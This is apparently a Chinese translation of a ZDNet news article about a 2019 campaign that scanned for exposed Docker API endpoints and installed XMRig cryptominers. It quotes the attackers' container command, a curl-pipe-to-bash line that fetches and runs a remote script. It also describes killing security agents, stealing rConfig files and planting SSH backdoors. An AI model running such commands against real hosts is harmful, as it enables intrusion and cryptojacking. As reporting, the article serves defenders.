现在都快 2020 年了,但还有不少系统管理员,仍然将 Docker 管理端口暴露在互联网上。
目前,有家黑客组织正在互联网上进行大规模的扫描,试图寻找那些在互联网上暴露了 API 端点的 Docker 平台。
黑客组织这次扫描行动的目的,是让他们能够向 Docker 实例发送命令,并在公司的 Docker 实例上部署加密货币挖矿程序,最终利用他们的算力进行挖矿,从而为黑客组织自身带来利益。
专业行动
这次大规模扫描行动于 11 月 24 日开始,由于扫描行动的规模极其庞大,因此一开始就立即引起了人们的注意。
Bad Packets LLC 的首席研究官兼联合创始人 Troy Mursch 对 ZDNet 称:“Bad Packets CTI API 的用户应该清楚利用暴露的 Docker 实例进行攻击并非什么新鲜事,而且这种行为经常发生。”
他指出,“黑客组织这次行动的不同之处在于,他们这次扫描行动规模特别夸张。仅此一点,就值得我们进一步调查,分析他们利用僵尸网络的意图究竟是什么。”
作为本次扫描行动的发现者,Mursch 说:“正如其他人指出的,这次行动的规模可不是那种脚本攻击的小孩把戏。黑客组织在这次扫描行动中投入了大量精力,但我们还没有搞清楚他们到底想干什么。”
推特用户 Bad Packets Report(@bad_packets)在 11 月 25 日发推文称:
这是一场扫描互联网上暴露的 Docker API 端点的随机性大规模扫描行动。
这些扫描行动利用 Alpine Linux 映像来创建一个容器,并通过以下方式执行有效负载:
"Command": chroot /mnt /bin/sh -c 'curl -sL4 https://t.co/q047bRPUyj | bash;'
目前我们所掌握的情况
到目前为止,我们所知道的是,这些攻击背后的组织正在扫描超过 59000 个 IP 网络(网络块),试图寻找暴露的 Docker 实例。
一旦黑客组织识别出暴露的主机后,攻击者就会使用 API 端点启动 Alpine Linux OS 容器,并在其中执行以下命令:
上面的命令从攻击者的服务器下载并运行一份 Bash 脚本。这个脚本的作用就是在目标设备上安装一个经典 XMRRig 加密货币的挖矿程序。Mursch 指出,在这次行动开始后的两天,黑客组织已经挖出了 14.82 枚门罗币(XMR),其价格略高于 740 美元。
此外,Mursch 还发现,这种恶意扫描行动还有某种自我防御的机制。
Mursch 告诉我们:“这次黑客行动,虽然并非原创,但我们观察到一个有趣的情况,就是黑客组织会从 http://ix.io/1XQh 下载脚本来卸载已知的监视代理程序并杀死大量相关进程。”
Mursch 通过检查这个脚本,还发现黑客组织不仅正在试图禁用安全产品,还关闭了与竞争对手的加密货币挖矿僵尸网络(如 DDG)相关的 LSO 进程。
此外,Mursch 还发现,这个恶意脚本还有一个功能,就是它能够通过扫描受感染的主机来查找 rConfig 配置文件,并对其进行加密和窃取,然后将文件发送回黑客组织的服务器(一般是僵尸网络)。
此外,Sandfly Security 的创始人 Craig H. Rowland 也注意到,黑客组织还在被入侵的容器上创建后门账户,并留下 SSH 密钥以便更方便他们日后进行访问,这样,他们就可以从远程控制所有受感染的肉鸡目标。
Mursch 建议,运行 Docker 实例的用户和组织,应立即检查自己是否在互联网上公开了 API 端点,如果已经公开,就立即关闭端口,然后关停无法识别的运行中的容器。
作者介绍:
Catalin Cimpanu,ZDNet 的信息安全记者,负责报道网络安全、数据泄露、黑客攻击和其他相关话题。此前曾担任 Bleeping Computer 和 Softpedia 的信息安全记者。
原文链接:
A hacking group is hijacking Docker systems with exposed API endpoints
分布式云行业实践指南(2023)
业内首个分布式云行业实践方法论、工具箱。
评论